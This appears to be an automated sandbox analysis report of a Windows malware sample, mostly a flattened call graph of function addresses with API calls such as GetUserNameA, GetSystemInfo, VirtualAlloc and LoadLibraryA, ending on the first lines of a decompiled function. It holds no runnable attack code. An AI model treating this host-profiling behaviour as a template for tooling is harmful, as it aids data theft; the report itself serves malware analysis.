8064->8065 8066 1740db 8065->8066 8067 17eaab 3 API calls 8066->8067 8068 1740f4 8067->8068 8069 17ea2f lstrcpy 8068->8069 8070 1740fc 8069->8070 8071 17eaab 3 API calls 8070->8071 8072 174115 8071->8072 8073 17ea2f lstrcpy 8072->8073 8074 17411d 8073->8074 8075 17eaab 3 API calls 8074->8075 8076 174135 8075->8076 8077 17ea2f lstrcpy 8076->8077 8078 17413d 8077->8078 8079 17ea69 2 API calls 8078->8079 8080 174153 8079->8080 8081 17ea2f lstrcpy 8080->8081 8082 17415b 8081->8082 8083 174163 10 API calls 8082->8083 8085 1741db 8083->8085 8084 17eaab 3 API calls 8084->8085 8085->7984 8085->8084 8086 17ea2f lstrcpy 8085->8086 8086->8085 8088 178d60 8087->8088 8090 178d02 8087->8090 8088->7074 8089 17e9eb 2 API calls 8091 178d4a strtok_s 8089->8091 8090->8089 8090->8091 8092 17e9eb 2 API calls 8090->8092 8091->8088 8091->8090 8092->8090 8096 178bf8 8093->8096 8094 178cc8 8094->7082 8095 17e9eb 2 API calls 8095->8096 8096->8094 8096->8095 8097 178caa strtok_s 8096->8097 8097->8096 8099 17e990 lstrcpy 8098->8099 8100 179300 8099->8100 8101 17eaab 3 API calls 8100->8101 8102 179311 8101->8102 8103 17ea2f lstrcpy 8102->8103 8104 179319 8103->8104 8105 17eaab 3 API calls 8104->8105 8106 179331 8105->8106 8107 17ea2f lstrcpy 8106->8107 8108 179339 8107->8108 8109 17eaab 3 API calls 8108->8109 8110 17934d 8109->8110 8111 17ea2f lstrcpy 8110->8111 8112 179355 8111->8112 8113 17eaab 3 API calls 8112->8113 8114 17936d 8113->8114 8115 17ea2f lstrcpy 8114->8115 8116 179375 8115->8116 8117 17eaab 3 API calls 8116->8117 8118 179389 8117->8118 8119 17ea2f lstrcpy 8118->8119 8120 179391 8119->8120 8121 17eaab 3 API calls 8120->8121 8122 1793a9 8121->8122 8123 17ea2f lstrcpy 8122->8123 8124 1793b1 8123->8124 8125 17eaab 3 API calls 8124->8125 8126 1793c5 8125->8126 8127 17ea2f lstrcpy 8126->8127 8128 1793cd 8127->8128 8129 17eaab 3 API calls 8128->8129 8130 1793e1 8129->8130 8131 17ea2f lstrcpy 8130->8131 8132 1793e9 8131->8132 8133 17eaab 3 API calls 8132->8133 8134 179402 8133->8134 8135 17ea2f lstrcpy 8134->8135 8136 17940a 8135->8136 8137 17eaab 3 API calls 8136->8137 8138 17941e 8137->8138 8139 17ea2f lstrcpy 8138->8139 8140 179426 8139->8140 8141 17eaab 3 API calls 8140->8141 8142 17943f 8141->8142 8143 17ea2f lstrcpy 8142->8143 8144 179447 8143->8144 8145 17d0be 3 API calls 8144->8145 8146 179457 8145->8146 8147 17ea69 2 API calls 8146->8147 8148 179464 8147->8148 8149 17ea2f lstrcpy 8148->8149 8150 17946c 8149->8150 8151 17eaab 3 API calls 8150->8151 8152 179488 8151->8152 8153 17ea2f lstrcpy 8152->8153 8154 179490 8153->8154 8155 17eaab 3 API calls 8154->8155 8156 1794a9 8155->8156 8157 17ea2f lstrcpy 8156->8157 8158 1794b1 8157->8158 8159 1794b9 GetProcessHeap RtlAllocateHeap 8158->8159 8160 1794f3 8159->8160 8161 17eaab 3 API calls 8160->8161 8162 179524 8161->8162 8163 17ea2f lstrcpy 8162->8163 8164 17952c 8163->8164 8165 17eaab 3 API calls 8164->8165 8166 179540 8165->8166 8167 17ea2f lstrcpy 8166->8167 8168 179548 8167->8168 8169 17eaab 3 API calls 8168->8169 8170 179561 8169->8170 8171 17ea2f lstrcpy 8170->8171 8172 179569 8171->8172 8173 179571 GetCurrentProcess 8172->8173 8174 179586 8173->8174 8175 17eaab 3 API calls 8174->8175 8176 1795a6 8175->8176 8177 17ea2f lstrcpy 8176->8177 8178 1795ae 8177->8178 8179 17eaab 3 API calls 8178->8179 8180 1795c2 8179->8180 8181 17ea2f lstrcpy 8180->8181 8182 1795ca 8181->8182 8183 17eaab 3 API calls 8182->8183 8184 1795e3 8183->8184 8185 17ea2f lstrcpy 8184->8185 8186 1795eb 8185->8186 8744 17d193 GetProcessHeap RtlAllocateHeap GetUserNameA 8186->8744 8188 1795f8 8189 17eaab 3 API calls 8188->8189 8190 179604 8189->8190 8191 17ea2f lstrcpy 8190->8191 8192 17960c 8191->8192 8193 17eaab 3 API calls 8192->8193 8194 179620 8193->8194 8195 17ea2f lstrcpy 8194->8195 8196 179628 8195->8196 8197 17eaab 3 API calls 8196->8197 8198 179641 8197->8198 8199 17ea2f lstrcpy 8198->8199 8200 179649 8199->8200 8201 17d1c5 3 API calls 8200->8201 8202 179656 8201->8202 8203 17eaab 3 API calls 8202->8203 8204 179662 8203->8204 8205 17ea2f lstrcpy 8204->8205 8206 17966a 8205->8206 8207 17eaab 3 API calls 8206->8207 8208 17967e 8207->8208 8209 17ea2f lstrcpy 8208->8209 8210 179686 8209->8210 8211 17eaab 3 API calls 8210->8211 8212 17969f 8211->8212 8213 17ea2f lstrcpy 8212->8213 8214 1796a7 8213->8214 8215 1796af GetProcessHeap RtlAllocateHeap 8214->8215 8216 1796cb 8215->8216 8217 17eaab 3 API calls 8216->8217 8218 179705 8217->8218 8219 17ea2f lstrcpy 8218->8219 8220 17970d 8219->8220 8221 17eaab 3 API calls 8220->8221 8222 179721 8221->8222 8223 17ea2f lstrcpy 8222->8223 8224 179729 8223->8224 8225 17eaab 3 API calls 8224->8225 8226 179742 8225->8226 8227 17ea2f lstrcpy 8226->8227 8228 17974a 8227->8228 8229 179752 GetProcessHeap RtlAllocateHeap 8228->8229 8230 179771 8229->8230 8231 17eaab 3 API calls 8230->8231 8232 17979e 8231->8232 8233 17ea2f lstrcpy 8232->8233 8234 1797a6 8233->8234 8235 17eaab 3 API calls 8234->8235 8236 1797ba 8235->8236 8237 17ea2f lstrcpy 8236->8237 8238 1797c2 8237->8238 8239 17eaab 3 API calls 8238->8239 8240 1797db 8239->8240 8241 17ea2f lstrcpy 8240->8241 8242 1797e3 8241->8242 8243 17eaab 3 API calls 8242->8243 8244 17982b 8243->8244 8245 17ea2f lstrcpy 8244->8245 8246 179833 8245->8246 8247 17eaab 3 API calls 8246->8247 8248 179847 8247->8248 8249 17ea2f lstrcpy 8248->8249 8250 17984f 8249->8250 8251 17eaab 3 API calls 8250->8251 8252 179868 8251->8252 8253 17ea2f lstrcpy 8252->8253 8254 179870 8253->8254 8745 17d200 8254->8745 8257 17ea69 2 API calls 8258 17988f 8257->8258 8259 17ea2f lstrcpy 8258->8259 8260 179897 8259->8260 8261 17eaab 3 API calls 8260->8261 8262 1798b3 8261->8262 8263 17ea2f lstrcpy 8262->8263 8264 1798bb 8263->8264 8265 17eaab 3 API calls 8264->8265 8266 1798d4 8265->8266 8267 17ea2f lstrcpy 8266->8267 8268 1798dc 8267->8268 8269 17eaab 3 API calls 8268->8269 8270 17990e 8269->8270 8271 17ea2f lstrcpy 8270->8271 8272 179916 8271->8272 8273 17eaab 3 API calls 8272->8273 8274 17992a 8273->8274 8275 17ea2f lstrcpy 8274->8275 8276 179932 8275->8276 8277 17eaab 3 API calls 8276->8277 8278 17994b 8277->8278 8279 17ea2f lstrcpy 8278->8279 8280 179953 8279->8280 8281 17995b GetProcessHeap RtlAllocateHeap 8280->8281 8282 179995 8281->8282 8283 17eaab 3 API calls 8282->8283 8284 1799c6 8283->8284 8285 17ea2f lstrcpy 8284->8285 8286 1799ce 8285->8286 8287 17eaab 3 API calls 8286->8287 8288 1799e2 8287->8288 8289 17ea2f lstrcpy 8288->8289 8290 1799ea 8289->8290 8291 17eaab 3 API calls 8290->8291 8292 179a03 8291->8292 8293 17ea2f lstrcpy 8292->8293 8294 179a0b 8293->8294 8751 17d2f3 8294->8751 8297 17eaab 3 API calls 8298 179a24 8297->8298 8299 17ea2f lstrcpy 8298->8299 8300 179a2c 8299->8300 8301 17eaab 3 API calls 8300->8301 8302 179a40 8301->8302 8303 17ea2f lstrcpy 8302->8303 8304 179a48 8303->8304 8305 17eaab 3 API calls 8304->8305 8306 179a61 8305->8306 8307 17ea2f lstrcpy 8306->8307 8308 179a69 8307->8308 8309 179a71 GetSystemInfo 8308->8309 8310 179a96 8309->8310 8311 17eaab 3 API calls 8310->8311 8312 179aab 8311->8312 8313 17ea2f lstrcpy 8312->8313 8314 179ab3 8313->8314 8315 17eaab 3 API calls 8314->8315 8316 179ac7 8315->8316 8317 17ea2f lstrcpy 8316->8317 8318 179acf 8317->8318 8319 17eaab 3 API calls 8318->8319 8320 179ae8 8319->8320 8321 17ea2f lstrcpy 8320->8321 8322 179af0 8321->8322 8323 179af8 GetProcessHeap RtlAllocateHeap 8322->8323 8324 179b0c GlobalMemoryStatusEx 8323->8324 8326 179b3a 8324->8326 8327 17eaab 3 API calls 8326->8327 8328 179b70 8327->8328 8329 17ea2f lstrcpy 8328->8329 8330 179b78 8329->8330 8331 17eaab 3 API calls 8330->8331 8332 179b8c 8331->8332 8333 17ea2f lstrcpy 8332->8333 8334 179b94 8333->8334 8335 17eaab 3 API calls 8334->8335 8336 179bac 8335->8336 8337 17ea2f lstrcpy 8336->8337 8338 179bb4 8337->8338 8339 179bf4 GetProcessHeap RtlAllocateHeap 8338->8339 8340 179c17 8339->8340 8341 17e990 lstrcpy 8340->8341 8342 179c23 8341->8342 8343 17ea69 2 API calls 8342->8343 8344 179c30 8343->8344 8345 17ea2f lstrcpy 8344->8345 8346 179c38 8345->8346 8347 17eaab 3 API calls 8346->8347 8348 179c57 8347->8348 8349 17ea2f lstrcpy 8348->8349 8350 179c5f 8349->8350 8351 17eaab 3 API calls 8350->8351 8352 179c7e 8351->8352 8353 17ea2f lstrcpy 8352->8353 8354 179c86 8353->8354 8355 17eaab 3 API calls 8354->8355 8356 179c9d 8355->8356 8357 17ea2f lstrcpy 8356->8357 8358 179ca5 8357->8358 8760 17d3b2 8358->8760 8361 17ea69 2 API calls 8362 179cc5 8361->8362 8363 17ea2f lstrcpy 8362->8363 8364 179ccd 8363->8364 8365 17eaab 3 API calls 8364->8365 8366 179cf3 8365->8366 8367 17ea2f lstrcpy 8366->8367 8368 179cfb 8367->8368 8369 17eaab 3 API calls 8368->8369 8370 179d1a 8369->8370 8371 17ea2f lstrcpy 8370->8371 8372 179d22 8371->8372 8373 17eaab 3 API calls 8372->8373 8374 179d41 8373->8374 8375 17ea2f lstrcpy 8374->8375 8376 179d49 8375->8376 8377 17eaab 3 API calls 8376->8377 8378 179d63 8377->8378 8379 17ea2f lstrcpy 8378->8379 8380 179d6b 8379->8380 8381 17eaab 3 API calls 8380->8381 8382 179d87 8381->8382 8383 17ea2f lstrcpy 8382->8383 8384 179d8f 8383->8384 8766 17d460 8384->8766 8386 179da8 8387 17ea69 2 API calls 8386->8387 8388 179db7 8387->8388 8389 17ea2f lstrcpy 8388->8389 8390 179dbf 8389->8390 8391 17eaab 3 API calls 8390->8391 8392 179de1 8391->8392 8393 17ea2f lstrcpy 8392->8393 8394 179de9 8393->8394 8395 17eaab 3 API calls 8394->8395 8396 179e05 8395->8396 8397 17ea2f lstrcpy 8396->8397 8398 179e0d 8397->8398 8399 17d460 7 API calls 8398->8399 8400 179e26 8399->8400 8401 17ea69 2 API calls 8400->8401 8402 179e35 8401->8402 8403 17ea2f lstrcpy 8402->8403 8404 179e3d 8403->8404 8405 17eaab 3 API calls 8404->8405 8406 179e5f 8405->8406 8407 17ea2f lstrcpy 8406->8407 8408 179e67 8407->8408 8409 17eaab 3 API calls 8408->8409 8410 179e81 8409->8410 8411 17ea2f lstrcpy 8410->8411 8412 179e89 8411->8412 8413 17eaab 3 API calls 8412->8413 8414 179ea5 8413->8414 8415 17ea2f lstrcpy 8414->8415 8416 179ead 8415->8416 8778 17d661 8416->8778 8418 179ebd 8419 17ea69 2 API calls 8418->8419 8420 179eca 8419->8420 8421 17ea2f lstrcpy 8420->8421 8422 179ed2 8421->8422 8423 179ee2 lstrlen 8422->8423 8424 17e990 lstrcpy 8423->8424 8425 179eff 8424->8425 8426 1716cb lstrcpy 8425->8426 8427 179f0c 8426->8427 8784 173786 8427->8784 8429 179f15 8429->7086 8431 1736f6 8430->8431 8431->7090 8433 17e9eb 2 API calls 8432->8433 8434 1789da 8433->8434 8924 174a96 malloc 8434->8924 8436 178b81 lstrlen 8437 17e9c2 lstrcpy 8436->8437 8438 178b9e 8437->8438 8439 1716cb lstrcpy 8438->8439 8440 178bab 8439->8440 8441 173786 28 API calls 8440->8441 8443 178bb4 8441->8443 8442 17e990 lstrcpy 8444 1789e5 8442->8444 8443->7094 8444->8436 8444->8442 8446 17ea69 2 API calls 8444->8446 8447 17eaab lstrlen lstrcpy lstrcat 8444->8447 8448 17ea2f lstrcpy 8444->8448 8450 1716cb lstrcpy 8444->8450 8451 17e9c2 lstrcpy 8444->8451 8927 17848a 8444->8927 8974 178645 8444->8974 9031 17885d 8444->9031 8446->8444 8447->8444 8448->8444 8450->8444 8451->8444 8454 178e13 8453->8454 8457 178d98 8453->8457 8454->7102 8455 17e9eb 2 API calls 8456 178df9 strtok_s 8455->8456 8456->8454 8456->8457 8457->8455 8457->8456 8459 17e990 lstrcpy 8458->8459 8460 171174 8459->8460 8461 17e990 lstrcpy 8460->8461 8462 17117d 8461->8462 8463 17d8c9 lstrcpy 8462->8463 8464 171187 8463->8464 8465 17ea69 2 API calls 8464->8465 8466 171195 8465->8466 8467 17ea2f lstrcpy 8466->8467 8468 17119d 8467->8468 8469 1711b5 8468->8469 8470 17120a 8468->8470 8471 17ea69 2 API calls 8469->8471 8472 17ea69 2 API calls 8470->8472 8473 1711ca 8471->8473 8474 17121c 8472->8474 8475 17eaab 3 API calls 8473->8475 8476 17eaab 3 API calls 8474->8476 8477 1711d2 8475->8477 8478 171224 8476->8478 8480 17ea69 2 API calls 8477->8480 8479 17ea69 2 API calls 8478->8479 8482 17122f 8479->8482 8481 1711dd 8480->8481 8483 17eaab 3 API calls 8481->8483 8484 17eaab 3 API calls 8482->8484 8485 1711e5 8483->8485 8486 171237 8484->8486 8487 17ea2f lstrcpy 8485->8487 8488 17ea69 2 API calls 8486->8488 8499 1711ed 8487->8499 8489 171242 8488->8489 8490 17ea2f lstrcpy 8489->8490 8490->8499 8491 17128a 8491->7118 8492 17ea69 lstrcpy lstrcat 8492->8499 8493 17ea2f lstrcpy 8493->8499 8494 17e990 lstrcpy 8494->8499 8495 17d78f 2 API calls 8495->8499 8496 17eaab lstrlen lstrcpy lstrcat 8496->8499 8497 17e9c2 lstrcpy 8497->8499 8498 174b85 CloseHandle 8498->8499 8499->8491 8499->8492 8499->8493 8499->8494 8499->8495 8499->8496 8499->8497 8499->8498 8500 1716cb lstrcpy 8499->8500 8501 173786 28 API calls 8499->8501 8500->8499 8501->8499 8503 17915f 8502->8503 8511 178e7f 8502->8511 8503->7114 8504 178f32 lstrcpy 8505 17d8c9 lstrcpy 8504->8505 8506 178f74 8505->8506 9742 17dbc6 8506->9742 8507 17e9eb 2 API calls 8509 17913f strtok_s 8507->8509 8509->8503 8509->8511 8511->8504 8511->8507 8511->8509 8512 17d8c9 lstrcpy 8513 178fa0 8512->8513 8513->8512 8514 17dbc6 lstrlen 8513->8514 8515 178fbd lstrcpy 8514->8515 8517 178fd6 8515->8517 8516 17d8c9 lstrcpy 8516->8517 8517->8516 8518 17dbc6 lstrlen 8517->8518 8519 178ff3 lstrcpy 8518->8519 8521 17900c 8519->8521 8520 17d8c9 lstrcpy 8520->8521 8521->8520 8522 17dbc6 lstrlen 8521->8522 8523 179029 lstrcpy 8522->8523 8525 179042 8523->8525 8541 17ab62 8540->8541 8542 17aafa 8540->8542 8541->7120 8542->8541 8543 17e9c2 lstrcpy 8542->8543 8544 1716cb lstrcpy 8542->8544 9746 17aa4a strtok_s 8542->9746 8543->8542 8544->8542 8547 17ad97 lstrcat lstrcat 8546->8547 8549 1716cb lstrcpy 8547->8549 8550 17ae09 8549->8550 9768 17ab6f 8550->9768 8552 17ae1b 8574 17d8c9 lstrcpy 8573->8574 8575 17b332 lstrcat 8574->8575 8576 171839 8575->8576 8577 17b34a lstrcat lstrcat lstrcat lstrcat lstrcat 8576->8577 8578 17e990 lstrcpy 8577->8578 8580 17b3bd 8578->8580 8585 17d8c9 lstrcpy 8584->8585 8586 17b6a1 lstrcat 8585->8586 8587 171839 8586->8587 8588 17b6b9 lstrcat 8587->8588 8589 1716cb lstrcpy 8588->8589 8614 17d8c9 lstrcpy 8613->8614 8615 17b7f5 lstrcat 8614->8615 8616 171839 8615->8616 8617 17b80d lstrcat lstrcat lstrcat 8616->8617 9818 17eb20 8626->9818 8687 17d8c9 lstrcpy 8686->8687 8688 17c6c4 lstrcat 8687->8688 8696 17da5c 8695->8696 8727 173106 8726->8727 8727->8727 8728 17310d malloc malloc malloc lstrlen 8727->8728 8729 173156 8728->8729 8729->7826 8731 17e990 lstrcpy 8730->8731 8732 17d7a2 8731->8732 8733 17e990 lstrcpy 8732->8733 8734 17d7b0 GetSystemTime 8733->8734 8735 17d7d1 8734->8735 8735->7839 8738 17ea83 8736->8738 8737 173227 8737->7844 8738->8737 8739 17ea95 lstrcpy lstrcat 8738->8739 8739->8737 8741 174c43 8740->8741 8743 173628 8740->8743 8742 174c53 CryptStringToBinaryA 8741->8742 8741->8743 8742->8743 8743->7845 8743->7855 8744->8188 8746 17e990 lstrcpy 8745->8746 8747 17d219 8746->8747 8748 179881 8747->8748 8749 17eaab lstrlen lstrcpy lstrcat 8747->8749 8750 17ea2f lstrcpy 8747->8750 8748->8257 8749->8747 8750->8747 8759 17d31b 8751->8759 8752 17d350 8753 17d6ff GetProcessHeap 8752->8753 8754 179a18 8753->8754 8754->8297 8755 17d39d 8755->8754 8757 17d6ff GetProcessHeap 8755->8757 8757->8754 8759->8752 8759->8754 8759->8755 8916 17d6ff 8759->8916 8919 17d71c GetProcessHeap RtlAllocateHeap 8759->8919 8761 17e990 lstrcpy 8760->8761 8765 17d3c8 8761->8765 8762 179cb8 8762->8361 8763 17eaab lstrlen lstrcpy lstrcat 8763->8765 8764 17ea2f lstrcpy 8764->8765 8765->8762 8765->8763 8765->8764 8767 17e990 lstrcpy 8766->8767 8768 17d478 8767->8768 8769 17d4a7 8768->8769 8777 17d4be 8768->8777 8770 17e9c2 lstrcpy 8769->8770 8773 17d4b1 8770->8773 8771 17d633 8772 17e9c2 lstrcpy 8771->8772 8772->8773 8773->8386 8774 17d55e lstrlen 8774->8777 8775 17ea2f lstrcpy 8775->8777 8776 17eaab lstrlen lstrcpy lstrcat 8776->8777 8777->8771 8777->8774 8777->8775 8777->8776 8779 17e990 lstrcpy 8778->8779 8780 17d678 8779->8780 8781 17d6f2 CloseHandle 8780->8781 8782 17ea2f lstrcpy 8780->8782 8783 17eaab lstrlen lstrcpy lstrcat 8780->8783 8781->8418 8782->8780 8783->8780 8785 17e9c2 lstrcpy 8784->8785 8786 17379f 8785->8786 8787 1730f8 4 API calls 8786->8787 8788 1737ab 8787->8788 8920 17d912 8788->8920 8791 17d912 2 API calls 8792 1737f3 8791->8792 8793 17e990 lstrcpy 8792->8793 8794 173804 8793->8794 8795 17e990 lstrcpy 8794->8795 8796 17380d 8795->8796 8797 17e990 lstrcpy 8796->8797 8798 173816 8797->8798 8799 17e990 lstrcpy 8798->8799 8800 17381f 8799->8800 8801 17e990 lstrcpy 8800->8801 8802 173828 8801->8802 8803 17d78f 2 API calls 8802->8803 8816 173d0a 8802->8816 8804 173862 8803->8804 8805 17ea69 2 API calls 8804->8805 8806 173870 8805->8806 8807 17ea2f lstrcpy 8806->8807 8808 173878 8807->8808 8809 17eaab 3 API calls 8808->8809 8810 1738a0 8809->8810 8811 17ea69 2 API calls 8810->8811 8812 1738ab 8811->8812 8813 17eaab 3 API calls 8812->8813 8814 1738b3 8813->8814 8815 17ea2f lstrcpy 8814->8815 8817 1738bb 8815->8817 8816->8429 8818 17eaab 3 API calls 8817->8818 8819 1738e7 8818->8819 8820 17ea69 2 API calls 8819->8820 8821 1738ef 8820->8821 8822 17ea2f lstrcpy 8821->8822 8823 1738f7 8822->8823 8823->8816 8824 17eaab 3 API calls 8823->8824 8825 173977 8824->8825 8826 17ea2f lstrcpy 8825->8826 8827 17397f 8826->8827 8828 17ea69 2 API calls 8827->8828 8829 173992 8828->8829 8830 17ea2f lstrcpy 8829->8830 8831 17399a 8830->8831 8832 17eaab 3 API calls 8831->8832 8833 1739b3 8832->8833 8834 17ea2f lstrcpy 8833->8834 8835 1739bb 8834->8835 8836 17eaab 3 API calls 8835->8836 8837 1739d4 8836->8837 8838 17ea2f lstrcpy 8837->8838 8839 1739dc 8838->8839 8840 17eaab 3 API calls 8839->8840 8841 1739f5 8840->8841 8842 17ea2f lstrcpy 8841->8842 8843 1739fd 8842->8843 8844 17eaab 3 API calls 8843->8844 8845 173a15 8844->8845 8846 17ea2f lstrcpy 8845->8846 8847 173a1d 8846->8847 8848 17ea69 2 API calls 8847->8848 8849 173a33 8848->8849 8850 17ea2f lstrcpy 8849->8850 8851 173a3b 8850->8851 8852 17eaab 3 API calls 8851->8852 8853 173a4f 8852->8853 8854 17ea2f lstrcpy 8853->8854 8855 173a57 8854->8855 8856 17eaab 3 API calls 8855->8856 8857 173a6f 8856->8857 8858 17ea2f lstrcpy 8857->8858 8859 173a77 8858->8859 8860 17ea69 2 API calls 8859->8860 8861 173a8d 8860->8861 8862 17ea2f lstrcpy 8861->8862 8863 173a95 8862->8863 8864 17eaab 3 API calls 8863->8864 8865 173aa9 8864->8865 8917 17d71a 8916->8917 8918 17d708 GetProcessHeap 8916->8918 8917->8759 8918->8917 8919->8759 8921 17d923 8920->8921 8922 1737d8 lstrlen 8920->8922 8921->8922 8923 17d93c GetProcessHeap RtlAllocateHeap 8921->8923 8922->8791 8923->8922 9074 174874 8924->9074 8926 174abd 8926->8444 8928 17e990 lstrcpy 8927->8928 8929 1784a1 8928->8929 9106 17d8c9 8929->9106 8932 17ea69 2 API calls 8933 1784c1 8932->8933 8934 17ea2f lstrcpy 8933->8934 8935 1784c9 8934->8935 8936 17ea69 2 API calls 8935->8936 8937 1784e7 8936->8937 8938 17ea2f lstrcpy 8937->8938 8939 1784ef 8938->8939 8940 17e990 lstrcpy 8939->8940 8941 178500 8940->8941 8942 17ea69 2 API calls 8941->8942 8943 17850e 8942->8943 8944 17ea2f lstrcpy 8943->8944 8945 178516 8944->8945 8946 17eaab 3 API calls 8945->8946 8947 178534 8946->8947 8948 17eaab 3 API calls 8947->8948 8949 17853c 8948->8949 8950 17ea2f lstrcpy 8949->8950 8951 178544 8950->8951 8952 17e9c2 lstrcpy 8951->8952 8953 178560 8952->8953 8959 17857c 8953->8959 9110 174d0f 8953->9110 8954 1716cb lstrcpy 8956 17859b 8954->8956 8957 17e9c2 lstrcpy 8956->8957 8958 1785b2 8957->8958 8960 17e9c2 lstrcpy 8958->8960 8959->8954 8961 1785bf 8960->8961 8962 17e990 lstrcpy 8961->8962 8963 1785ce 8962->8963 9119 17627b 8963->9119 8975 17e990 lstrcpy 8974->8975 8976 17865c 8975->8976 8977 17e990 lstrcpy 8976->8977 8978 178665 8977->8978 8979 17d8c9 lstrcpy 8978->8979 8980 178677 8979->8980 8981 17ea69 2 API calls 8980->8981 8982 178685 8981->8982 8983 17ea2f lstrcpy 8982->8983 8984 17868d 8983->8984 8985 17ea69 2 API calls 8984->8985 8986 1786ab 8985->8986 8987 17ea69 2 API calls 8986->8987 8988 1786b6 8987->8988 8989 17ea2f lstrcpy 8988->8989 8990 1786be 8989->8990 8991 17d8c9 lstrcpy 8990->8991 8992 1786d8 8991->8992 8993 17ea69 2 API calls 8992->8993 8994 1786e4 8993->8994 8995 17ea2f lstrcpy 8994->8995 8996 1786ec 8995->8996 8997 17e990 lstrcpy 8996->8997 8998 178705 8997->8998 8999 17ea69 2 API calls 8998->8999 9000 178713 8999->9000 9001 17ea2f lstrcpy 9000->9001 9002 17871b 9001->9002 9003 17eaab 3 API calls 9002->9003 9004 178739 9003->9004 9005 17eaab 3 API calls 9004->9005 9006 178741 9005->9006 9007 17ea2f lstrcpy 9006->9007 9008 178749 9007->9008 9009 17e9c2 lstrcpy 9008->9009 9011 178765 9009->9011 9010 178781 9013 1716cb lstrcpy 9010->9013 9011->9010 9012 174d0f 5 API calls 9011->9012 9012->9010 9014 1787a0 9013->9014 9015 17e9c2 lstrcpy 9014->9015 9016 1787b7 9015->9016 9017 17e9c2 lstrcpy 9016->9017 9018 1787c4 9017->9018 9032 17e990 lstrcpy 9031->9032 9033 178874 9032->9033 9034 17e990 lstrcpy 9033->9034 9035 17887d 9034->9035 9036 17d8c9 lstrcpy 9035->9036 9037 178887 9036->9037 9038 17ea69 2 API calls 9037->9038 9039 178895 9038->9039 9040 17ea2f lstrcpy 9039->9040 9041 17889d 9040->9041 9042 17ea69 2 API calls 9041->9042 9043 1788bb 9042->9043 9044 17ea2f lstrcpy 9043->9044 9045 1788c3 9044->9045 9046 17ea69 2 API calls 9045->9046 9047 1788d8 9046->9047 9048 17ea2f lstrcpy 9047->9048 9049 1788e0 9048->9049 9050 17eaab 3 API calls 9049->9050 9051 1788fe 9050->9051 9052 17eaab 3 API calls 9051->9052 9053 178906 9052->9053 9054 17ea2f lstrcpy 9053->9054 9055 17890e 9054->9055 9056 17e9c2 lstrcpy 9055->9056 9057 17892a 9056->9057 9066 178992 9057->9066 9400 179f34 9057->9400 9059 17893b 9060 17e990 lstrcpy 9059->9060 9061 17894b 9060->9061 9538 174f4b 9061->9538 9066->8444 9075 174886 9074->9075 9076 17488b 9074->9076 9075->8926 9087 174408 9076->9087 9078 1748ac 9079 17491e 9078->9079 9091 1744c1 9078->9091 9079->8926 9081 1748ba 9081->9079 9097 17468b 9081->9097 9083 17492a 9083->9079 9086 17d6ff GetProcessHeap 9083->9086 9084 1748e8 9084->9079 9084->9083 9085 17d6ff GetProcessHeap 9084->9085 9085->9083 9086->9079 9088 174419 9087->9088 9090 174420 9088->9090 9104 17d71c GetProcessHeap RtlAllocateHeap 9088->9104 9090->9078 9092 174500 VirtualAlloc 9091->9092 9093 1744da 9091->9093 9094 174532 9092->9094 9095 17452c 9092->9095 9093->9092 9094->9081 9095->9094 9096 174537 VirtualAlloc 9095->9096 9096->9094 9098 1747c1 9097->9098 9100 1746a5 9097->9100 9098->9084 9099 1746bf LoadLibraryA 9099->9098 9099->9100 9100->9098 9100->9099 9102 174790 GetProcAddress 9100->9102 9103 17d6ff GetProcessHeap 9100->9103 9105 17d71c GetProcessHeap RtlAllocateHeap 9100->9105 9102->9098 9102->9100 9103->9100 9104->9090 9105->9100 9107 17d900 9106->9107 9108 17e990 lstrcpy 9107->9108 9109 1784b3 9108->9109 9109->8932 9111 17e990 lstrcpy 9110->9111 9112 174d29 9111->9112 9153 174b85 9112->9153 9114 174d34 9115 174c21 2 API calls 9114->9115 9118 174dd2 9114->9118 9116 174da7 9115->9116 9117 174dba memcmp 9116->9117 9116->9118 9117->9118 9118->8959 9120 17e990 lstrcpy 9119->9120 9121 176295 9120->9121 9122 17ea69 2 API calls 9121->9122 9123 1762a8 9122->9123 9124 17eaab 3 API calls 9123->9124 9156 174ba6 9153->9156 9154 174c13 9154->9114 9155 174c0a CloseHandle 9155->9154 9156->9154 9156->9155 9401 179f4c 9400->9401 9537 17a3a6 9400->9537 9402 17e990 lstrcpy 9401->9402 9403 179f5d 9402->9403 9404 17e990 lstrcpy 9403->9404 9405 179f69 9404->9405 9406 17e990 lstrcpy 9405->9406 9407 179f72 9406->9407 9408 17e990 lstrcpy 9407->9408 9409 179f7e 9408->9409 9410 17e990 lstrcpy 9409->9410 9411 179f8a 9410->9411 9412 17e990 lstrcpy 9411->9412 9413 179f96 9412->9413 9414 17e990 lstrcpy 9413->9414 9415 179fa2 9414->9415 9416 17e990 lstrcpy 9415->9416 9537->9059 9539 174f6a 9538->9539 9540 17e990 lstrcpy 9539->9540 9541 174f77 9540->9541 9542 17e9eb 2 API calls 9541->9542 9543 174f7d 9542->9543 9544 17eaab 3 API calls 9543->9544 9545 174f8d 9544->9545 9546 17ea69 2 API calls 9545->9546 9547 174f98 9546->9547 9548 17ea2f lstrcpy 9547->9548 9549 174fa0 9548->9549 9743 17dbd7 9742->9743 9744 178f87 lstrcpy 9743->9744 9745 17dbf0 lstrlen 9743->9745 9744->8513 9745->9744 9747 17aa6c 9746->9747 9748 1716cb lstrcpy 9747->9748 9749 17aac0 9747->9749 9752 17a769 9747->9752 9748->9747 9749->8542 9751 17aaa9 strtok_s 9751->9747 9753 17a78a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9752->9753 9754 17aa34 9753->9754 9755 17a7cc lstrcat 9753->9755 9756 17a895 lstrcat lstrlen 9753->9756 9758 17a769 31 API calls 9753->9758 9759 17e990 lstrcpy 9753->9759 9760 174b85 CloseHandle 9753->9760 9761 1716cb lstrcpy 9753->9761 9762 173786 28 API calls 9753->9762 9763 17dc1e 9753->9763 9754->9751 9755->9753 9756->9753 9758->9753 9759->9753 9760->9753 9761->9753 9762->9753 9765 17dc3f 9763->9765 9764 17dc46 9764->9753 9765->9764 9766 17dc64 CloseHandle 9765->9766 9767 17dc5c CloseHandle 9765->9767 9766->9764 9767->9764 9776 17ab93 9768->9776 9769 17ad21 9769->8552 9770 17abea 6 API calls 9771 17e990 lstrcpy 9770->9771 9771->9776 9772 174b85 CloseHandle 9772->9776 9773 17e990 lstrcpy 9773->9776 9774 1716cb lstrcpy 9774->9776 9775 173786 28 API calls 9775->9776 9776->9769 9776->9770 9776->9772 9776->9773 9776->9774 9776->9775 9819 17ba70 50 API calls 9818->9819

              Executed Functions

              Control-flow Graph

              C-Code - Quality: 93%
              			E0017DD84(void* __ecx) {
              				signed int _v8;
              				struct HINSTANCE__* _t14;
